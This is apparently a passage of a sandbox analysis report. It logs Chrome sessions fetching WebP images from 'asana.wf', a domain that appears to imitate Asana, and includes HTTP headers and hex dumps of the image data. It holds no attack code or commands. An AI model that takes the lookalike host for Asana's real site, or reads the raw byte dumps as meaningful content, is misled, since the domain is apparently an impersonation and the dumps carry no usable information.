                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: 49 12 18 d9 c3 6d 07 be 45 8a 98 e2 1b e6 92 7a 9c f4 93 7c a5 88 97 45 63 af 95 18 9f 35 23 0e 8c f4 9c ff 59 b9 46 99 b4 6e 46 a4 9a 48 2a 27 73 06 39 15 45 37 80 5f 6b c3 12 4a f1 10 1a d9 e9 84 de d5 8e 25 25 8d 4a 34 a7 20 2b 2c 0d 2d e1 8d fc ee d9 19 0f 1e b2 b1 b0 f1 9c e1 c6 ad 03 94 f1 fc 97 ec 3f 15 be 05 1b d4 70 6e 7e 92 1c 81 c5 c6 91 48 b7 d8 77 3c 58 f2 e5 9f 92 f5 29 2b 95 13 70 d0 55 63 f1 f5 2e 5e 89 d4 65 ef 07 e2 f5 e9 4e 3c a2 2e 99 0b 76 dd a4 2c f3 e6 3b f9 6c 96 46 4f 48 4c 96 6b 0f e8 f1 5e 4c f1 20 52 45 11 66 fb a9 8c 3d 30 8b 0d 60 8c 4e ff 75 a5 fe b7 b6 8e 2b dc 18 84 8f 42 22 8b 6f 0b 81 c6 dc 3f 72 72 d0 76 56 d5 fb bc 03 5b 4d 33 33 b6 f1 d0 6d 31 a2 08 2f 43 35 56 8c d7 d0 c1 74 77 2b d5 e8 89 2d af 5e b3 bd 16 b0 84 c8
                                                                                                                                                                                                                    Data Ascii: ImEz|Ec5#YFnFH*'s9E7_kJ%%J4 +,-?pn~Hw<X)+pUc.^eN<.v,;lFOHLk^L REf=0`Nu+B"o?rrvV[M33m1/C5Vtw+-^
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC582INData Raw: 06 ad f0 80 bd af d3 bc b1 f5 72 75 41 02 b9 13 d5 b5 89 26 18 23 ec 31 ca 8e d2 c7 cd d1 cb da c7 58 8d e9 47 fd df 83 45 95 4d 0f b4 df 13 60 00 00 fe 1d 44 de dd ab 32 88 a8 64 02 16 de 25 4c 8c 54 37 85 59 b6 84 b2 9f 6e 4e 17 19 3e 09 bb 50 c4 6a 01 44 bf 34 1d c4 08 27 5c 8a 15 a5 e9 62 7b 8d a5 bd d2 f5 e0 aa c3 08 da 20 5d 88 a4 c9 cf a0 91 e8 64 a5 3c 59 14 c1 51 6a 07 b6 71 27 61 6e 63 a5 9a ad eb 5a 97 31 94 72 96 46 46 ae 85 41 dd 65 3a 69 30 c3 df 2d 11 1f c4 63 f8 a0 ad 2f e0 2c 60 c2 f0 54 da 17 ad 50 38 f6 b2 22 07 f4 ed 8b f1 8f b2 3e a2 f9 a6 b3 46 e1 a7 a8 c5 b5 54 05 04 be d2 b2 e2 65 aa fb f7 e8 ee 08 99 7f 60 64 aa f3 90 55 45 28 a5 10 71 c7 f4 71 f5 a9 6a 20 e7 6f 09 0c 31 d5 4a 45 1d 22 e3 d5 f7 2f 14 3f 95 71 ca 1e 8d d4 5c 6c 77
                                                                                                                                                                                                                    Data Ascii: ruA&#1XGEM`D2d%LT7YnN>PjD4'\b{ ]d<YQjq'ancZ1rFFAe:i0-c/,`TP8">FTe`dUE(qqj o1JE"/?q\lw


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    24192.168.2.164972994.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC595OUTGET /img/card-figma-asana-customer.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "3318-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 13080
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 10 33 00 00 57 45 42 50 56 50 38 20 04 33 00 00 d0 4c 01 9d 01 2a 30 02 75 01 3e 91 40 9b 49 25 a3 a3 26 2a 91 eb 38 c0 12 09 67 6d f6 f2 8c 4b 99 bc 07 da 2d d0 ae f5 79 b1 ca 36 d7 1c f2 8f de a4 a4 26 07 a8 2f 9d 6a c1 63 0d 9a 5d c8 f0 17 7f 3b 8c 33 9e 95 53 39 9f c1 fa 1c fa 43 78 01 fd 9b d4 57 a5 b7 ee f7 b2 3f ed 89 c7 e7 cd 6b 6d 71 a1 aa 93 d7 a9 4e 73 e8 3e b4 a0 6f db de d2 99 ca 76 46 08 ae d9 53 44 76 1f 59 8c 7a dd 90 88 74 c0 61 40 73 a0 8f 68 1a 5c 3b 83 ea ef c8 32 e5 b8 24 77 f2 a3 01 9f b8 97 3c 8f 77 12 fe b2 f7 0f ab 7a cd 19 5b 70 1d f1 e9 2f d3 fc 78 13 b7 da c0 ff eb 35 90 9e c2 99 3e dd 0b 6d 5b 02 03 21 bf 8e c7 f9 b0 11 14 18 b0 bc 44 76 13 55 b6 a1 9f f4 a5 b4 9a 4c 39 8f 93 64 20 70 ca a0 b7 15 dd a0 0b c6 f8 a3
                                                                                                                                                                                                                    Data Ascii: RIFF3WEBPVP8 3L*0u>@I%&*8gmK-y6&/jc];3S9CxW?kmqNs>ovFSDvYzta@sh\;2$w<wz[p/x5>m[!DvUL9d p
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC5114INData Raw: 92 0d f5 08 29 03 93 5c 0b 2e f3 ae 53 2d ae 4e 30 ae 83 10 6f da 3e 74 1a 67 a2 48 55 98 d0 5f fd bc b0 ef c9 84 96 91 c6 74 55 86 a3 b4 12 24 fc d3 3f fc 22 a2 37 7e 44 f1 8d 10 9e 4e bc 8f 21 1c e8 44 c6 12 59 62 81 82 5e 2b f9 08 05 9d 7a f6 92 fa 24 a3 bd f2 72 df f2 a6 05 c1 32 5e 96 24 84 47 33 ff 94 b7 f4 b6 d8 4f b3 5b 9c 00 68 5a cc 0d 59 8d b0 75 ac 6e 75 75 e4 22 79 77 ea e0 ff 7f 29 29 41 26 7e 83 ee 21 ec dc a4 ab 79 63 0c df ac 50 c6 1f c6 ed 0f e7 3f 9c 06 5b 3d 3d 98 45 bf 0c e1 db 21 05 d6 ce 0a dc db 43 67 7c 50 b5 47 df da 2f 16 c3 4c cb 88 23 72 69 1b b2 b7 00 89 08 00 14 46 81 74 6d 02 fb 50 55 70 e1 c8 f7 7a d3 20 91 e0 c1 26 f8 0a 44 d9 be 59 c5 a7 cb 92 d1 3a 84 44 5e 41 f4 7f c7 49 13 71 fa 5c b9 3b 67 3f 97 9c 62 00 87 89 9f 45
                                                                                                                                                                                                                    Data Ascii: )\.S-N0o>tgHU_tU$?"7~DN!DYb^+z$r2^$G3O[hZYunuu"yw))A&~!ycP?[==E!Cg|PG/L#riFtmPUpz &DY:D^AIq\;g?bE


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    25192.168.2.164973194.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC368OUTGET /img/home24-marketing-team-en-ui.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "67ee-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 26606
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 e6 67 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 b9 05 00 13 04 00 41 4c 50 48 e6 02 00 00 01 1c b5 6d db 30 f2 ff 67 3b 7d ce 10 11 13 40 ac a3 b8 9e 71 36 27 70 10 49 52 24 b5 84 91 30 52 90 82 83 c3 c1 e1 00 1c b0 0e 38 07 2b 01 09 23 61 24 ec ff 08 e8 88 8b 88 09 30 90 b6 8d 7f fb db fe 44 44 e2 61 48 dd 7c a1 e4 3e 7a 0e 78 5f be be 90 73 6b fa 8e 94 85 a2 37 7d e1 e3 0b 49 b7 f8 a8 2c 44 bd dc 93 79 a1 ea 43 ee 8c 85 ac cf 37 ca 42 d7 cb 45 5c 08 7b 3a 51 63 6c 2e 87 b6 50 f6 02 40 17 d2 2e 40 63 6d 19 30 d6 e6 08 0b 6d 0f 99 b7 a5 ce db 7e 83 b7 99 f3 36 5f fe fe e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc
                                                                                                                                                                                                                    Data Ascii: RIFFgWEBPVP8XALPHm0g;}@q6'pIR$0R8+#a$0DDaH|>zx_sk7}I,DyC7BE\{:Qcl.P@.@cm0m~6_?????
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: 3f c9 c4 8b a4 20 e1 0e d5 51 87 28 33 e1 be 25 94 e8 dd 6a 72 0f ba 26 06 a4 b9 0f fa 6c 10 e5 01 92 94 96 01 84 49 f4 b2 65 5f 17 f6 66 2a a0 1b e6 a9 97 3b c4 ba 5a 75 30 1c 6e ec 52 24 9a cd 11 ce 07 29 fe f2 30 16 71 6f 93 b4 b9 31 a5 43 25 47 14 fa b3 57 bc 55 a4 c3 76 ab ae a8 67 17 fa 4a 29 6f 39 fb 54 54 06 48 c0 00 8f 4c dc 48 8e 6a 10 a8 73 67 c6 5b 04 e6 b9 ca aa fa c7 f9 b5 31 dc a8 73 eb f6 5f 07 9c e7 b0 69 c1 e0 18 c4 bf f0 f0 5b cb 82 c5 0d 3f 78 8a a9 aa 5b 3c 91 5b 27 13 7e 06 53 9d 08 6e 78 eb ee 28 ce 83 b8 44 1a 19 97 aa c3 95 66 76 0e ca 54 17 b4 3c 6e 4a f0 6d 0f 83 00 ec 44 f7 cb 33 6e 54 62 ef e3 03 43 99 65 9e 4a 31 56 a0 fb 1d f7 75 dc 9d f1 b6 74 5a 9b e2 7b 5b f8 e2 7a 1f a7 95 c9 02 34 81 6e 8a 50 7c 85 2a 33 27 ca 3d c9 34
                                                                                                                                                                                                                    Data Ascii: ? Q(3%jr&lIe_f*;Zu0nR$)0qo1C%GWUvgJ)o9TTHLHjsg[1s_i[?x[<['~Snx(DfvT<nJmD3nTbCeJ1VutZ{[z4nP|*3'=4
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: c2 a2 05 7c 8f 87 6a 8b e2 a4 d0 d6 d6 0e 10 e4 da 8c b8 15 97 3a 30 d8 17 29 1a b0 48 a2 94 93 96 81 16 46 27 62 88 85 30 03 cf d1 1d d7 03 d8 0b 0e fc 62 b4 0c 07 c0 09 2e 99 26 09 8a ef 34 ef ce af c7 ba 84 00 d1 9a 7b 70 8f 37 7d 6d 8d 83 0c c2 41 01 cf f1 51 8b 55 84 e3 22 bd 46 a6 8b 06 45 a4 ed c2 87 a2 10 24 07 68 ec 38 a3 6c 49 2d b1 db e8 06 40 a0 a6 be 3e 91 3b 0f 42 50 28 3c 5f 46 3e a9 78 1e ed d0 60 16 b0 32 82 eb d0 c3 b1 bf 94 83 17 ea c2 31 a0 00 1f a6 7a 39 cb d8 2e 33 fc 55 3d 3f 77 75 4c 15 cd 8b 24 51 c1 17 3d 7a 9f 00 8c 37 11 74 2c 74 50 66 95 7c 9b 21 d8 ee c0 fb 5b 1b 0f a4 93 70 9d 41 94 05 6e 49 17 98 fa 5c 2d 5d 6e aa 0f b1 e5 f8 23 c6 eb 82 94 49 99 0a c8 6c 50 e1 22 79 ee 41 6e 43 c0 b6 22 85 79 bd b4 e9 15 97 86 08 e9 55 36
                                                                                                                                                                                                                    Data Ascii: |j:0)HF'b0b.&4{p7}mAQU"FE$h8lI-@>;BP(<_F>x`21z9.3U=?wuL$Q=z7t,tPf|![pAnI\-]n#IlP"yAnC"yU6
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC2640INData Raw: 35 12 77 c6 12 c8 b3 04 90 70 32 5e 87 88 fe fb 54 19 f4 0f 92 fc 64 b6 4e 7b 9a d5 85 9f fe 4f 17 c5 35 f3 10 ac 9d 66 f8 33 cc 96 d6 c2 02 b6 6f 2c 00 05 05 70 1c 7c 66 85 d5 db 47 c8 63 17 c5 30 6f 33 f3 cb 8e 5d 71 6d d8 75 da 67 15 b1 88 18 12 df 5b 72 d6 8f 06 26 eb 4e f0 2b 53 66 91 0c 66 13 92 5b f0 6c fd 30 0d 95 c2 7d cd e3 4a 39 49 c7 5f 45 2b b5 97 63 3d 4a 48 e4 7c bc 9a bf 99 a2 39 8c 6a 01 42 8e 31 7c 07 c2 6c 93 78 18 e8 18 6e fe e6 7e 2a cd 0a b7 ce 7b c1 9a 29 11 97 e7 f2 1b b2 da 1a 82 62 52 0f 36 94 89 1d d1 1d d1 cb 33 cc bf 75 bf 7f 64 78 4a fc 21 53 dc 3b 32 8b 05 be 52 92 4e ad b1 d6 47 3f 2d 4d b5 7e 59 70 86 21 ba 4a a7 b0 ca b5 72 60 19 39 1c 48 52 08 14 fe 58 15 50 35 60 6c ca 24 ef 4f 45 4b 95 c3 11 45 11 3d 90 91 87 8e fe 08
                                                                                                                                                                                                                    Data Ascii: 5wp2^TdN{O5f3o,p|fGc0o3]qmug[r&N+Sff[l0}J9I_E+c=JH|9jB1|lxn~*{)bR63udxJ!S;2RNG?-M~Yp!Jr`9HRXP5`l$OEKE=


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    26192.168.2.164973394.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC600OUTGET /img/card-sony-music-asana-customer.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "31cc-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 12748
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 c4 31 00 00 57 45 42 50 56 50 38 20 b8 31 00 00 f0 08 01 9d 01 2a 30 02 75 01 3e 91 42 9c 4b 25 a3 a6 27 a3 11 0b 50 f0 12 09 65 6e c8 7c 34 f1 aa 6d a5 b7 66 bc cf 2e ae 69 f3 30 39 dc 06 fc 9e 94 ff b4 ee ed f3 4d e6 85 e9 8f fa 97 4c f7 ad d7 a3 27 4d 65 8b 5f e7 bf d5 f8 b3 e7 7b e6 7e e9 fb 31 e7 fe d6 bf 9b fe 52 fd ff ae 2f ee 7c 1f f9 dd a8 5f b5 ff de f0 26 80 5f d2 ff c3 ff d7 f3 fd fb bf 3b 7c 41 7f a0 79 e9 ff 93 c5 cb f1 1f f5 7d 83 ff a8 7f a7 f4 9c d2 2a a2 fd 2f 3f 75 7d 89 4a 3b f1 c5 f5 1b 28 d9 46 ca 36 51 b2 8e 67 51 b2 8d 94 6c 18 ed 92 4d 51 7d 20 75 a9 0d fd a5 fc 39 48 ad 56 b2 6d 0b 71 4f c8 f7 f8 72 90 df 8b 81 22 44 5d 93 ca a4 51 b2 c4 6a d9 d8 42 4e fa db d2 8a a2 43 63 6e 74 ef 72 3b a2 41 2e 37 ba 06 0b 71 30 17
                                                                                                                                                                                                                    Data Ascii: RIFF1WEBPVP8 1*0u>BK%'Pen|4mf.i09ML'Me_{~1R/|_&_;|Ay}*/?u}J;(F6QgQlMQ} u9HVmqOr"D]QjBNCcntr;A.7q0
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC4782INData Raw: 8b bf a7 01 c3 a5 05 23 cf 41 c3 f7 13 16 5a 90 af bc dd cb 87 ee e7 f7 fe b9 63 79 f9 43 13 1f 23 bd db c9 6d d8 a6 16 36 30 ab c3 fa 87 61 52 10 94 8b 24 be b9 dd 4d 67 91 62 80 28 f8 10 a3 db 83 9d 18 00 a8 21 08 00 75 6d 38 a7 e9 4d 38 cf 46 e2 fe 15 15 dc 9f 11 9b 8c e5 6f e8 d1 7c c6 17 56 9d b2 eb 9a e7 4f 8a 7b 8b 71 0e ff 51 66 c9 8b 81 a6 cf 9c 1e 98 50 c9 2d 3b ff cb 07 f2 ae 34 ea 6a e1 3c 12 9f 39 43 6a b8 8f e4 b2 89 df 84 ff 46 7f 1c 72 38 b0 d2 aa f9 69 ae eb 4a 14 f9 f1 f3 38 18 7b 23 ce f5 7b 12 d7 79 49 80 ad 89 c8 80 31 e8 ce 1f 63 a0 46 61 45 6f 3c 78 49 55 18 bc 0d da 6b 5d 8b 0f 18 35 0c f9 bb d5 86 38 74 ba 2d aa 24 63 7c f1 5b 88 7c 32 2d 1a ac 09 a7 c3 ad 67 06 fa be 40 de bd e7 a1 da fb cd a5 e8 9e b9 c9 32 d1 42 a4 cd a2 db fd
                                                                                                                                                                                                                    Data Ascii: #AZcyC#m60aR$Mgb(!um8M8Fo|VO{qQfP-;4j<9CjFr8iJ8{#{yI1cFaEo<xIUk]58t-$c|[|2-g@2B


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    27192.168.2.164973594.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC356OUTGET /img/home24-goals-ui.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC226INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "5a96-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 23190
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7966INData Raw: 52 49 46 46 8e 5a 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 b9 05 00 61 03 00 41 4c 50 48 b8 02 00 00 01 1c 22 01 12 f8 3f 5b 93 d9 10 11 49 3b 22 be 14 6b 08 d9 b6 e5 a9 de 08 5f 04 a2 90 44 4d e0 6c 20 09 46 03 67 02 69 a0 09 dc 1a b0 06 d0 e0 fb 3c 7f 40 80 f7 ba 4e 44 4c 80 43 6a db f6 e4 41 f8 10 86 32 94 21 0c 21 83 0f 21 84 0c 42 08 a1 0c 9a c1 18 fa 79 ce b9 22 22 d0 e9 a7 b4 57 a3 e4 75 4b c1 63 bc 5c ab 91 f3 7d 71 63 24 1a 45 5f dc 80 a9 1a 49 cf c7 ae 68 44 7d 6e 93 97 51 f5 55 5a 36 23 eb cf 86 68 74 7d fe e3 64 7c 5d 2f bf b8 9d b0 59 91 1f 77 a3 ec 33 00 67 9c 5d 05 b8 93 36 0b c0 ce da 0a bc b1 76 f5 81 b7 5d 12 6d b3 b4 f1 b6 5c 79 5b 31 de ae ff fe e3 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9 cf 7f fe f3 9f ff fc e7 3f ff f9
                                                                                                                                                                                                                    Data Ascii: RIFFZWEBPVP8XaALPH"?[I;"k_DMl Fgi<@NDLCjA2!!!By""WuKc\}qc$E_IhD}nQUZ6#ht}d|]/Yw3g]6v]m\y[1???
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC8000INData Raw: 81 16 be e4 5c ac cc e8 2b 8b 83 20 20 65 c7 9c b2 51 e2 b4 3c e3 ea 0b 27 e1 e4 43 49 a7 4b c4 d0 f1 dc be c9 6a 09 9a 2a 7d 72 aa 36 8d 7d e1 60 11 7d 4f d6 12 6c c5 f6 f7 50 9b 5f 61 30 60 51 b6 4e 16 03 34 9d 64 99 3c 17 1a df 17 80 d9 3b 92 c3 e7 e4 24 e9 20 86 58 d9 fb 9d 64 74 60 94 e3 e7 df bd fb f0 1d f0 bb b8 f5 5f 2f 13 a0 af fe 4c ee 75 e8 9e 76 54 0c 90 12 19 b3 f8 e2 07 ec 17 0d 1e 05 32 b8 74 b1 22 1c 4c 52 1f 49 9e 2e 4f 29 8b dd f5 5d 8b fb d4 d9 ce da 9b a4 47 e6 a6 cb 74 f2 42 ba 9a 5b cf 69 ca 5a d1 e9 22 ed 18 8b 9f 40 4a 99 dd 34 06 6a ab 65 ac 4f 90 5b 65 7e 58 48 21 b8 ce fb 69 5b fb cc 0c da 49 2c 01 cb 54 7a 9d 9c d5 98 b4 63 78 c6 bc 52 f7 26 8d 82 c4 af c6 2d d4 d2 40 bc 41 3e 49 28 56 7b 6b 3d f0 17 e7 0f b1 37 42 92 a1 3a 5d
                                                                                                                                                                                                                    Data Ascii: \+ eQ<'CIKj*}r6}`}OlP_a0`QN4d<;$ Xdt`_/LuvT2t"LRI.O)]GtB[iZ"@J4jeO[e~XH!i[I,TzcxR&-@A>I(V{k=7B:]
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC7224INData Raw: 73 1e 00 ca 49 f7 5a f0 26 16 3e ea 78 4c 82 6b 31 ff d5 f2 bf ec 73 dc d0 d6 d9 0c ad 76 8d fb a8 f1 5b ac 80 1a a1 6f 9b 69 c0 b7 c5 1a 8c b1 0a 3f 0f 20 fd 15 cc ff a8 9a 68 b0 75 84 09 26 dc 0d 80 a1 58 04 95 37 4d c1 7c d9 ba ab 90 c9 67 34 e8 de 08 29 e4 f5 49 51 9b 12 8f cd 80 5b eb 2b 61 f2 f5 78 b2 8e b8 41 6f 08 e6 32 f3 7e 99 63 28 7c 09 7b 31 71 9d 82 dd d3 6b 8e a2 31 a9 76 b2 96 ec 70 58 60 98 87 25 e0 d4 a0 2f b1 c5 23 9f 61 c4 d2 bb 13 ea e0 a3 b0 66 65 9e bd 00 ef 92 4c ea 87 03 33 5c b2 a8 98 35 05 e9 1d da 99 3e 50 4b ce cd 55 6f df 2d 45 b2 a7 27 7a d8 cc 98 78 62 7d 5d 1c 0d a9 f3 fd e8 61 39 8c 7b b1 b2 cb d2 eb 97 e6 bb a0 00 0f ae 08 d8 bc f2 3e 31 c8 c5 29 97 15 97 5a 05 bb 34 63 39 23 ba 7d 78 86 6f b9 63 13 cf a6 ef 26 4e 0c 4b
                                                                                                                                                                                                                    Data Ascii: sIZ&>xLk1sv[oi? hu&X7M|g4)IQ[+axAo2~c(|{1qk1vpX`%/#afeL3\5>PKUo-E'zxb}]a9{>1)Z4c9#}xoc&NK


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    28192.168.2.164973294.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC582OUTGET /img/card-zoom-1x.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:58 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:58 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "235c-6164f3d14f831"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 9052
                                                                                                                                                                                                                    Connection: close
